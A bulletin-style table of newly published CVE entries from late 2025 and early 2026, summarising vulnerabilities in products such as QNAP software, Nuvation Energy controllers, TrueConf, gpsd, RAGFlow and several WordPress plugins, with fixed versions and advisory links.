| pangolin--fosrl | An issue in Fossorial fosrl/pangolin v.1.6.2 and before allows a remote attacker to escalate privileges via the 2FA component | 2025-12-29 | not yet calculated | CVE-2025-56333 | https://github.com/fosrl/pangolin https://gist.github.com/mrdgef/ef6fa41d69c0457874414c163d7d7d75 |
| machsol--machpanel | File upload vulnerability in machsol machpanel 8.0.32 allows attacker to gain a webshell. | 2025-12-29 | not yet calculated | CVE-2025-57460 | https://www.machsol.com/ https://github.com/aljoharasubaie/CVE-2025-57460/blob/main/README.md |
| machsol--machpanel | Stored cross-site scripting (xss) in machsol machpanel 8.0.32 allows attackers to execute arbitrary web scripts or HTML via a crafted PDF file. | 2025-12-29 | not yet calculated | CVE-2025-57462 | https://www.machsol.com/ https://github.com/aljoharasubaie/CVE-2025-57462/blob/main/README.md |
| QNAP Systems Inc.--QTS | An allocation of resources without limits or throttling vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-57705 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A path traversal vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following versions: QTS 5.2.8.3332 build 20251128 and later QuTS hero h5.2.8.3321 build 20251117 and later | 2026-01-02 | not yet calculated | CVE-2025-59380 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| QNAP Systems Inc.--QTS | A path traversal vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following versions: QTS 5.2.8.3332 build 20251128 and later QuTS hero h5.2.8.3321 build 20251117 and later | 2026-01-02 | not yet calculated | CVE-2025-59381 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| QNAP Systems Inc.--Qfiling | A path traversal vulnerability has been reported to affect Qfiling. The remote attackers can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following version: Qfiling 3.13.1 and later | 2026-01-02 | not yet calculated | CVE-2025-59384 | https://www.qnap.com/en/security-advisory/qsa-25-54 |
| QNAP Systems Inc.--MARS (Multi-Application Recovery Service) | An SQL injection vulnerability has been reported to affect MARS (Multi-Application Recovery Service). The remote attackers can then exploit the vulnerability to execute unauthorized code or commands. We have already fixed the vulnerability in the following version: MARS (Multi-Application Recovery Service) 1.2.1.1686 and later | 2026-01-02 | not yet calculated | CVE-2025-59387 | https://www.qnap.com/en/security-advisory/qsa-25-53 |
| QNAP Systems Inc.--Hyper Data Protector | An SQL injection vulnerability has been reported to affect Hyper Data Protector. The remote attackers can then exploit the vulnerability to execute unauthorized code or commands. We have already fixed the vulnerability in the following versions: Hyper Data Protector 2.2.4.1 and later | 2026-01-02 | not yet calculated | CVE-2025-59389 | https://www.qnap.com/en/security-advisory/qsa-25-48 |
| UxPlay-UxPlay | UxPlay 1.72 contains a double free vulnerability in its RTSP request handling. A specially crafted RTSP TEARDOWN request can trigger multiple calls to free() on the same memory address, potentially causing a Denial of Service. | 2025-12-29 | not yet calculated | CVE-2025-60458 | https://github.com/0pepsi/CVE-2025-60458 |
| SevenCs--ORCA | A local privilege escalation vulnerability exists in SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22). The flaw is a Time-of-Check Time-of-Use (TOCTOU) race condition in the license management logic. The regService process, which runs with SYSTEM privileges, creates a fixed directory and writes files without verifying whether the path is an NTFS reparse point. By exploiting this race condition, an attacker can replace the target directory with a junction pointing to a user-controlled path. This causes the SYSTEM-level process to drop binaries in a location fully controlled by the attacker, allowing arbitrary code execution with SYSTEM privileges. The vulnerability can be exploited by any standard user with only a single UAC confirmation, making it highly practical and dangerous in real-world environments. | 2025-12-31 | not yet calculated | CVE-2025-61037 | https://gist.github.com/jc0818/233462416579661e4e2795f96457a6bf |
| nixseparatedebuginfod--nixseparatedebuginfod | nixseparatedebuginfod before v0.4.1 is vulnerable to Directory Traversal. | 2025-12-30 | not yet calculated | CVE-2025-61557 | https://github.com/symphorien/nixseparatedebuginfod https://urldefense.us/v2/url?u=https-3A__github.com_symphorien_nixseparatedebuginfod_commit_57ac448324bfa11a8d8e8f9bea04ae9205ad18b2&d=DwIFaQ&c=Al8V6E3U0yBSSEuVtdZbGtsvjPA49U3WmtZAsdW0D_Q&r=Nrzxo0WDF_OE-Sa1wccaFKpKc1i6Uzf32ZZrlnVhmbk&m=dtk61i_OKshHyBz6nYW1Xx-pK5y9qdHl8ipsEqB31N2lKuU5GtTeg0C21yVO5M_W&s=wMjbc-B-uuwViJamR0q794vsOHExyt0nbnOuAZfxoGk&e= https://github.com/symphorien/nixseparatedebuginfod/blob/05ff4edf6953d0bcfedc3f448ed0ad9c4f279ee9/advisories/CVE-2025-61557.md |
| ruby--uri | URI is a module providing classes to handle Uniform Resource Identifiers. In versions prior to 0.12.5, 0.13.3, and 1.0.4, a bypass exists for the fix to CVE-2025-27221 that can expose user credentials. When using the `+` operator to combine URIs, sensitive information like passwords from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure. Versions 0.12.5, 0.13.3, and 1.0.4 fix the issue. | 2025-12-30 | not yet calculated | CVE-2025-61594 | https://www.ruby-lang.org/en/news/2025/10/07/uri-cve-2025-61594/ https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2025-61594.yml https://github.com/ruby/uri/commit/7e521b2da0833d964aab43019e735aea674e1c2c https://github.com/ruby/uri/commit/20157e3e29b125ff41f1d9662e2e3b1d066f5902 https://github.com/ruby/uri/commit/d3116ca66a3b1c97dc7577f9d2d6e353f391cd6a |
| QNAP Systems Inc.--HBS 3 Hybrid Backup Sync | A generation of error message containing sensitive information vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If an attacker gains local network access, they can then exploit the vulnerability to read application data. We have already fixed the vulnerability in the following version: HBS 3 Hybrid Backup Sync 26.2.0.938 and later | 2026-01-02 | not yet calculated | CVE-2025-62840 | https://www.qnap.com/en/security-advisory/qsa-25-46 |
| QNAP Systems Inc.--HBS 3 Hybrid Backup Sync | An external control of file name or path vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If an attacker gains local network access, they can then exploit the vulnerability to read or modify files or directories. We have already fixed the vulnerability in the following version: HBS 3 Hybrid Backup Sync 26.2.0.938 and later | 2026-01-02 | not yet calculated | CVE-2025-62842 | https://www.qnap.com/en/security-advisory/qsa-25-46 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: QTS 5.2.8.3332 build 20251128 and later | 2026-01-02 | not yet calculated | CVE-2025-62852 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| QNAP Systems Inc.--QuMagie | A cross-site scripting (XSS) vulnerability has been reported to affect QuMagie. The remote attackers can then exploit the vulnerability to bypass security mechanisms or read application data. We have already fixed the vulnerability in the following version: QuMagie 2.8.1 and later | 2026-01-02 | not yet calculated | CVE-2025-62857 | https://www.qnap.com/en/security-advisory/qsa-25-49 |
| Nuvation Energy--Battery Management System | A vulnerability in Nuvation Battery Management System allows Authentication Bypass.This issue affects Battery Management System: through 2.3.9. | 2026-01-02 | not yet calculated | CVE-2025-64119 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows OS Command Injection.This issue affects Multi-Stack Controller (MSC): from 2.3.8 before 2.5.1. | 2026-01-02 | not yet calculated | CVE-2025-64120 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Authentication Bypass Using an Alternate Path or Channel vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows Authentication Bypass.This issue affects Multi-Stack Controller (MSC): from 2.3.8 before 2.5.1. | 2026-01-02 | not yet calculated | CVE-2025-64121 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Insufficiently Protected Credentials vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows Signature Spoofing by Key Theft.This issue affects Multi-Stack Controller (MSC): through 2.5.1. | 2026-01-02 | not yet calculated | CVE-2025-64122 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Unintended Proxy or Intermediary vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows Network Boundary Bridging.This issue affects Multi-Stack Controller (MSC): through and including release 2.5.1. | 2026-01-02 | not yet calculated | CVE-2025-64123 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows OS Command Injection.This issue affects Multi-Stack Controller (MSC): before 2.5.1. | 2026-01-03 | not yet calculated | CVE-2025-64124 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--nCloud VPN Service | A vulnerability in Nuvation Energy nCloud VPN Service allowed Network Boundary Bridging.This issue affected the nCloud VPN Service and was fixed on 2025-12-1 (December, 2025). End users do not have to take any action to mitigate the issue. | 2026-01-03 | not yet calculated | CVE-2025-64125 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| discourse--discourse | Discourse is an open source discussion platform. Prior to versions 3.5.3, 2025.11.1, and 2025.12.0, an attacker who knows part of a username can find the user and their full name via UI or API, even when `enable_names` is disabled. Versions 3.5.3, 2025.11.1, and 2025.12.0 contain a fix. | 2025-12-30 | not yet calculated | CVE-2025-64528 | https://github.com/discourse/discourse/security/advisories/GHSA-c59w-jwx7-34v4 https://github.com/discourse/discourse/commit/1cb45b8b287597085e3514596ffb1d9b41938f81 https://github.com/discourse/discourse/commit/6192f55629624925595dae14364fd86cac0f09df https://github.com/discourse/discourse/commit/e936a523b5900a9d866d23ea3da904ba12bb0fb2 |
| SevenCs--ORCA | An incorrect NULL DACL issue exists in SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22). The regService process, which runs with SYSTEM privileges, applies a Security Descriptor to a device object with no explicitly configured DACL. This condition could allow an attacker to perform unauthorized raw disk operations, which could lead to system disruption (DoS) and exposure of sensitive data, and may facilitate local privilege escalation. | 2025-12-31 | not yet calculated | CVE-2025-64699 | https://gist.github.com/GunP4ng/42b19ee99e94c315173b74a9fb26c2b9 |
| gosaliajainam--online-movie-booking | SQL injection in gosaliajainam/online-movie-booking 5.5 in movie_details.php allows attackers to gain sensitive information. | 2026-01-02 | not yet calculated | CVE-2025-65125 | https://github.com/TheAnhaj/CVE-Researches |
| Recutils--GNU | A divide-by-zero in the encryption/decryption routines of GNU Recutils v1.9 allows attackers to cause a Denial of Service (DoS) via inputting an empty value as a password. | 2025-12-30 | not yet calculated | CVE-2025-65409 | https://www.gnu.org/software/recutils/ http://ftp.gnu.org/gnu/recutils/ https://lists.gnu.org/archive/html/bug-recutils/2025-10/msg00004.html https://github.com/MAXEUR5/Vulnerability_Disclosures/blob/main/2025/CVE-2025-65409.md |
| Unrtf--GNU | A NULL pointer dereference in the src/path.c component of GNU Unrtf v0.21.10 allows attackers to cause a Denial of Service (DoS) via injecting a crafted payload into the search_path parameter. | 2025-12-30 | not yet calculated | CVE-2025-65411 | https://www.gnu.org/software/unrtf/ https://savannah.gnu.org/projects/unrtf/ https://lists.gnu.org/archive/html/bug-unrtf/2025-11/msg00000.html https://sources.debian.org/src/unrtf/0.21.10-clean-1/src/main.c/#L661 https://github.com/MAXEUR5/Vulnerability_Disclosures/blob/main/2025/CVE-2025-65411.md |
| Vue--Vue | DOM-based Cross-Site Scripting (XSS) vulnerability in 201206030 novel V3.5.0 allows remote attackers to execute arbitrary JavaScript code or disclose sensitive information (e.g., user session cookies) via a crafted "wvstest" parameter in the URL or malicious script injection into window.localStorage. The vulnerability arises from insufficient validation and encoding of user-controllable data in the book comment module: unfiltered user input is stored in the backend database (book_comment table, commentContent field) and returned via API, then rendered directly into the page DOM via Vue 3's v-html directive without sanitization. Even if modern browsers' built-in XSS filters block pop-up alerts, attackers can use concealed payloads to bypass interception and achieve actual harm. | 2025-12-29 | not yet calculated | CVE-2025-65442 | https://github.com/201206030/novel https://github.com/201206030/novel-front-web https://github.com/zero-day348/DOM-based-Cross-Site-Scripting-XSS-Vulnerability-in-novel-V3.5.0-CWE-79- |
| jsish--jsish | A type confusion in jsish 2.0 allows incorrect control flow during execution of the OP_NEXT opcode. When an "instanceof" expression uses an array element access as the left-hand operand inside a for-in loop, the instructions implementation leaves an additional array reference on the stack rather than consuming it during OP_INSTANCEOF. As a result, OP_NEXT interprets the array as an iterator object and reads the iterCmd function pointer from an invalid structure, potentially causing a crash or enabling code execution depending on heap layout. | 2025-12-29 | not yet calculated | CVE-2025-65570 | https://blog.mcsky.ro/writeups/2025/11/15/inline8-writeup.html |
| Zeroheight--Zeroheight | An issue was discovered in Zeroheight (SaaS) prior to 2025-06-13. A legacy user creation API pathway allowed accounts to be created without completing the intended email verification step. While unverified accounts could not access product functionality, the behavior bypassed intended verification controls and allowed unintended account creation. This could have enabled spam/fake account creation or resource usage impact. No data exposure or unauthorized access to existing accounts was reported. | 2025-12-30 | not yet calculated | CVE-2025-65925 | https://github.com/Sneden/zeroheight-account-verification-bypass-CVE-2025-65925 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Versions prior to 0.24.5 have a Heap-Use-After-Free (UAF) vulnerability within the MQTT bridge client component (implemented via the underlying NanoNNG library). The vulnerability is triggered when NanoMQ acts as a bridge connecting to a remote MQTT broker. A malicious remote broker can trigger a crash (Denial of Service) or potential memory corruption by accepting the connection and immediately sending a malformed packet sequence. Version 0.34.5 contains a patch. The patch enforces stricter protocol adherence in the MQTT client SDK embedded in NanoMQ. Specifically, it ensures that CONNACK is always the first packet processed in the line. This prevents the state confusion that led to the Heap-Use-After-Free (UAF) when a malicious server sent a malformed packet sequence immediately after connection establishment. As a workaround, validate the remote broker before bridging. | 2026-01-01 | not yet calculated | CVE-2025-66023 | https://github.com/nanomq/nanomq/security/advisories/GHSA-24f7-q5hh-27hf https://github.com/nanomq/nanomq/issues/2145 https://github.com/nanomq/NanoNNG/pull/1365 |
| Brands Engine--inMusic | inMusic Brands Engine DJ 4.3.0 suffers from Insecure Permissions due to exposed HTTP service in the Remote Library, which allows attackers to access all files and network paths. | 2025-12-30 | not yet calculated | CVE-2025-66723 | http://inmusic.com https://github.com/audiopump/cve-2025-66723 |
| TrueConf--TrueConf | An HTML Injection vulnerability in TrueConf server 5.5.2.10813 in the conference description field allows an attacker to inject arbitrary HTML in the Create/Edit conference functionality. The payload will be triggered when the victim opens the Conference Info page ([conference url]/info). | 2025-12-30 | not yet calculated | CVE-2025-66823 | https://trueconf.com https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66823/README.md |
| TrueConf--TrueConf | A Stored Cross-Site Scripting (XSS) vulnerability exists in the Meeting location field of the Create/Edit Conference functionality in TrueConf Server v5.5.2.10813. The injected payload is stored via the meeting_room parameter and executed when users visit the Conference Info page, allowing attackers to achieve full Account Takeover (ATO). This issue is caused by improper sanitization of user-supplied input in the meeting_room field. | 2025-12-30 | not yet calculated | CVE-2025-66824 | https://trueconf.com https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66824/README.md |
| TrueConf--TrueConf | A CSV Formula Injection vulnerability in TrueConf Server v5.5.2.10813 allows a normal user to inject malicious spreadsheet formulas into exported chat logs via crafted Display Name. | 2025-12-30 | not yet calculated | CVE-2025-66834 | https://trueconf.com https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66834/README.md |
| TrueConf--TrueConf | TrueConf Client 8.5.2 is vulnerable to DLL hijacking via crafted wfapi.dll allowing local attackers to execute arbitrary code within the user's context. | 2025-12-30 | not yet calculated | CVE-2025-66835 | http://trueconf.com https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66835/README.md |
| JD Cloud--JD Cloud | JD Cloud NAS routers AX1800 (4.3.1.r4308 and earlier), AX3000 (4.3.1.r4318 and earlier), AX6600 (4.5.1.r4533 and earlier), BE6500 (4.4.1.r4308 and earlier), ER1 (4.5.1.r4518 and earlier), and ER2 (4.5.1.r4518 and earlier) contain an unauthorized remote command execution vulnerability. | 2025-12-30 | not yet calculated | CVE-2025-66848 | http://jd.com https://www.notion.so/JD-Cloud-Unauth-RCE-2d22b76e8e0c802c975bf186b208d0c2 |
| cp-demangle.c--cp-demangle.c | An issue was discovered in function d_unqualified_name in file cp-demangle.c in BinUtils 2.26 allowing attackers to cause a denial of service via crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66861 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash1.md |
| cp-demangle.c--cp-demangle.c | A buffer overflow vulnerability in function gnu_special in file cplus-dem.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66862 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash3.md |
| cp-demangle.c--cp-demangle.c | An issue was discovered in function d_discriminator in file cp-demangle.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66863 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash2.md |
| cp-demangle.c--cp-demangle.c | An issue was discovered in function d_print_comp_inner in file cp-demangle.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66864 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash5.md |
| cp-demangle.c--cp-demangle.c | An issue was discovered in function d_print_comp_inner in file cp-demangle.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66865 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash4.md |
| cp-demangle.c--cp-demangle.c | An issue was discovered in function d_abi_tags in file cp-demangle.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66866 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash6.md |
| libming-- libming | Buffer overflow vulnerability in function strcat in asan_interceptors.cpp in libming 0.4.8. | 2025-12-29 | not yet calculated | CVE-2025-66869 | https://github.com/libming/libming/issues/366 |
| libming-- libming | Buffer overflow vulnerability in function dcputchar in decompile.c in libming 0.4.8. | 2025-12-29 | not yet calculated | CVE-2025-66877 | https://github.com/libming/libming/issues/367 |
| Revotech--Revotech | An authentication bypass in the /cgi-bin/jvsweb.cgi endpoint of Revotech I6032W-FHW v1.0.0014 - 20210517 allows attackers to access sensitive information and escalate privileges via a crafted HTTP request. | 2026-01-02 | not yet calculated | CVE-2025-67158 | http://i6032w-fhw.com http://revotech.com https://github.com/Remenis/CVE-2025-67158 |
| Vatilon--Vatilon | Vatilon v1.12.37-20240124 was discovered to transmit user credentials in plaintext. | 2026-01-02 | not yet calculated | CVE-2025-67159 | http://vatilon.com https://github.com/Remenis/CVE-2025-67159 |
| Vatilon--Vatilon | An issue in Vatilon v1.12.37-20240124 allows attackers to access sensitive directories and files via a directory traversal. | 2026-01-02 | not yet calculated | CVE-2025-67160 | http://vatilon.com https://github.com/Remenis/CVE-2025-67160 |
| NagiosXI--NagiosXI | NagiosXI 2026R1.0.1 build 1762361101 is vulnerable to Directory Traversal in /admin/coreconfigsnapshots.php. | 2025-12-29 | not yet calculated | CVE-2025-67254 | https://www.nagios.org/ https://github.com/YongYe-Security/NagiosXI/tree/main |
| NagiosXI--NagiosXI | In NagiosXI 2026R1.0.1 build 1762361101, Dashboard parameters lack proper filtering, allowing any authenticated user to exploit a SQL Injection vulnerability. | 2025-12-29 | not yet calculated | CVE-2025-67255 | https://www.nagios.org/ https://github.com/YongYe-Security/NagiosXI/tree/main |
| gpsd--gpsd | gpsd before commit dc966aa contains a heap-based out-of-bounds write vulnerability in the drivers/driver_nmea2000.c file. The hnd_129540 function, which handles NMEA2000 PGN 129540 (GNSS Satellites in View) packets, fails to validate the user-supplied satellite count against the size of the skyview array (184 elements). This allows an attacker to write beyond the bounds of the array by providing a satellite count up to 255, leading to memory corruption, Denial of Service (DoS), and potentially arbitrary code execution. | 2026-01-02 | not yet calculated | CVE-2025-67268 | https://github.com/ntpsec/gpsd/commit/dc966aa74c075d0a6535811d98628625cbfbe3f4 https://github.com/ntpsec/gpsd/blob/master/drivers/driver_nmea2000.c https://github.com/Jaenact/gspd_cve/blob/main/CVE-2025-67268/README.md |
| gpsd--gpsd | An integer underflow vulnerability exists in the `nextstate()` function in `gpsd/packet.c` of gpsd versions prior to commit `ffa1d6f40bca0b035fc7f5e563160ebb67199da7`. When parsing a NAVCOM packet, the payload length is calculated using `lexer->length = (size_t)c - 4` without checking if the input byte `c` is less than 4. This results in an unsigned integer underflow, setting `lexer->length` to a very large value (near `SIZE_MAX`). The parser then enters a loop attempting to consume this massive number of bytes, causing 100% CPU utilization and a Denial of Service (DoS) condition. | 2026-01-02 | not yet calculated | CVE-2025-67269 | https://gitlab.com/gpsd/gpsd/-/commit/ffa1d6f40bca0b035fc7f5e563160ebb67199da7 https://gitlab.com/gpsd/gpsd https://github.com/Jaenact/gspd_cve/blob/main/CVE-2025-67269/README.md |
| composer--composer | Composer is a dependency manager for PHP. In versions on the 2.x branch prior to 2.2.26 and 2.9.3, attackers controlling remote sources that Composer downloads from might in some way inject ANSI control characters in the terminal output of various Composer commands, causing mangled output and potentially leading to confusion or DoS of the terminal application. There is no proven exploit and this has thus a low severity but we still publish a CVE as it has potential for abuse, and we want to be on the safe side informing users that they should upgrade. Versions 2.2.26 and 2.9.3 contain a patch for the issue. | 2025-12-30 | not yet calculated | CVE-2025-67746 | https://github.com/composer/composer/security/advisories/GHSA-59pp-r3rg-353g https://github.com/composer/composer/commit/1d40a95c9d39a6b7f80d404ab30336c586da9917 https://github.com/composer/composer/commit/5db1876a76fdef76d3c4f8a27995c434c7a43e71 https://github.com/composer/composer/releases/tag/2.2.26 https://github.com/composer/composer/releases/tag/2.9.3 |
| github.com/golang/vscode-go--github.com/golang/vscode-go | To prevent unexpected untrusted code execution, the Visual Studio Code Go extension is now disabled in Restricted Mode. | 2025-12-29 | not yet calculated | CVE-2025-68120 | https://nvd.nist.gov/vuln/detail/CVE-2025-68120 https://groups.google.com/g/golang-dev/c/CHG4qfcicBU/m/4tanFUymDQAJ https://pkg.go.dev/vuln/GO-2025-4249 |
| agronholm--cbor2 | cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) serialization format. Starting in version 3.0.0 and prior to version 5.8.0, whhen a CBORDecoder instance is reused across multiple decode operations, values marked with the shareable tag (28) persist in memory and can be accessed by subsequent CBOR messages using the sharedref tag (29). This allows an attacker-controlled message to read data from previously decoded messages if the decoder is reused across trust boundaries. Version 5.8.0 patches the issue. | 2025-12-31 | not yet calculated | CVE-2025-68131 | https://github.com/agronholm/cbor2/security/advisories/GHSA-wcj4-jw5j-44wh https://github.com/agronholm/cbor2/pull/268 |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. Versions prior to 2.19.0 of the appstore interface allow administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any `postinstall` script defined in `package.json`, enabling arbitrary code execution. The vulnerability exists because npm's version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious `postinstall` script. Version 2.19.0 contains a patch for the issue. | 2026-01-01 | not yet calculated | CVE-2025-68619 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-93jc-vqqc-vvvh https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| infiniflow--ragflow | RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In versions prior to 0.23.0, a low-privileged authenticated user (normal login account) can execute arbitrary system commands on the server host process via the frontend Canvas CodeExec component, completely bypassing sandbox isolation. This occurs because untrusted data (stdout) is parsed using eval() with no filtering or sandboxing. The intended design was to "automatically convert string results into Python objects," but this effectively executes attacker-controlled code. Additional endpoints lack access control or contain inverted permission logic, significantly expanding the attack surface and enabling chained exploitation. Version 0.23.0 contains a patch for the issue. | 2025-12-31 | not yet calculated | CVE-2025-68700 | https://github.com/infiniflow/ragflow/security/advisories/GHSA-8xw3-v6c2-j84j https://github.com/infiniflow/ragflow/commit/7a344a32f9f83529e12ca12f40f2657eb79fe811 |
| GoAhead-Webs--GoAhead-Webs | A stack-based buffer overflow exists in the GoAhead-Webs HTTP daemon on KuWFi 4G LTE AC900 devices with firmware 1.0.13. The /goform/formMultiApnSetting handler uses sprintf() to copy the user-supplied pincode parameter into a fixed 132-byte stack buffer with no bounds checks. This allows an attacker to corrupt adjacent stack memory, crash the web server, and (under certain conditions) may enable arbitrary code execution. | 2025-12-29 | not yet calculated | CVE-2025-68706 | https://kuwfi.com/products/kuwfi-gigabit-wireless-router-4g-lte-wifi-router-dual-band-portable-wifi-modem-hotspot-64-user-with-gigabit-wan-lan-rj11-port https://github.com/actuator/cve/tree/main/Kuwfi https://drive.proton.me/urls/HJCJYAC7JM#XtHcm3P7QaYk https://github.com/actuator/cve/blob/main/Kuwfi/CVE-2025-68706.txt |
| miniOrange--WordPress Social Login and Register | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in miniOrange WordPress Social Login and Register miniorange-login-openid allows PHP Local File Inclusion.This issue affects WordPress Social Login and Register: from n/a through <= 7.7.0. | 2025-12-30 | not yet calculated | CVE-2025-68974 | https://vdp.patchstack.com/database/Wordpress/Plugin/miniorange-login-openid/vulnerability/wordpress-wordpress-social-login-and-register-plugin-7-7-0-local-file-inclusion-vulnerability?_s_id=cve |
| Eagle-Themes--Eagle Booking | Authorization Bypass Through User-Controlled Key vulnerability in Eagle-Themes Eagle Booking eagle-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Eagle Booking: from n/a through <= 1.3.4.3. | 2025-12-30 | not yet calculated | CVE-2025-68975 | https://vdp.patchstack.com/database/Wordpress/Plugin/eagle-booking/vulnerability/wordpress-eagle-booking-plugin-1-3-4-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Eagle-Themes--Eagle Booking | Missing Authorization vulnerability in Eagle-Themes Eagle Booking eagle-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Eagle Booking: from n/a through <= 1.3.4.3. | 2025-12-30 | not yet calculated | CVE-2025-68976 | https://vdp.patchstack.com/database/Wordpress/Plugin/eagle-booking/vulnerability/wordpress-eagle-booking-plugin-1-3-4-3-settings-change-vulnerability?_s_id=cve |
| designthemes--DesignThemes Portfolio Addon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes DesignThemes Portfolio Addon designthemes-portfolio-addon allows DOM-Based XSS.This issue affects DesignThemes Portfolio Addon: from n/a through <= 1.5. | 2025-12-30 | not yet calculated | CVE-2025-68977 | https://vdp.patchstack.com/database/Wordpress/Plugin/designthemes-portfolio-addon/vulnerability/wordpress-designthemes-portfolio-addon-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| designthemes--DesignThemes Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes DesignThemes Core designthemes-core allows DOM-Based XSS.This issue affects DesignThemes Core: from n/a through <= 1.6. | 2025-12-30 | not yet calculated | CVE-2025-68978 | https://vdp.patchstack.com/database/Wordpress/Plugin/designthemes-core/vulnerability/wordpress-designthemes-core-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SimpleCalendar--Google Calendar Events | Authorization Bypass Through User-Controlled Key vulnerability in SimpleCalendar Google Calendar Events google-calendar-events allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Google Calendar Events: from n/a through <= 3.5.9. | 2025-12-30 | not yet calculated | CVE-2025-68979 | https://vdp.patchstack.com/database/Wordpress/Plugin/google-calendar-events/vulnerability/wordpress-google-calendar-events-plugin-3-5-9-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| designthemes--WeDesignTech Portfolio | Missing Authorization vulnerability in designthemes WeDesignTech Portfolio wedesigntech-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WeDesignTech Portfolio: from n/a through <= 1.0.2. | 2025-12-30 | not yet calculated | CVE-2025-68980 | https://vdp.patchstack.com/database/Wordpress/Plugin/wedesigntech-portfolio/vulnerability/wordpress-wedesigntech-portfolio-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve |
